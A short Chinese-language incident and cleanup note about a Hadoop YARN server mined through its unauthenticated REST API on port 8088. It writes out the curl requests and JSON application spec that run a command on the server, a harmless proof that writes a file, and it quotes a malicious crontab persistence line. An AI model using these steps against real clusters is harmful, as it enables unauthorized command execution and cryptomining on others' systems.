一、背景
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务
1、创建应用
curl -v -X POST 'http://192.168.1.1:8088/ws/v1/cluster/apps/new-application'
2、构建json文件
{
"am-container-spec": {
"commands": {
"command": "echo '111' > /var/tmp/11112222_test_11112222"
}
},
"application-id": "application_1675146160084_0001",
"application-name": "test",
"application-type": "YARN"
}
3、提交任务
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://192.168.1.1:8088/ws/v1/cluster/apps --data-binary @1.json
4、查看执行情况
http://192.168.1.1:8088/cluster/app/application_1675146160084_0001
5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件
二、清理挖矿
1、检查/tmp和/var/tmp目录,删除异常文件
2、检查crontab -l,删除可疑脚本
4 * * * * /root/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
3、删除可疑进程
参考资料:
https://paper.seebug.org/611/
https://www.cnblogs.com/wshichang/p/14948393.html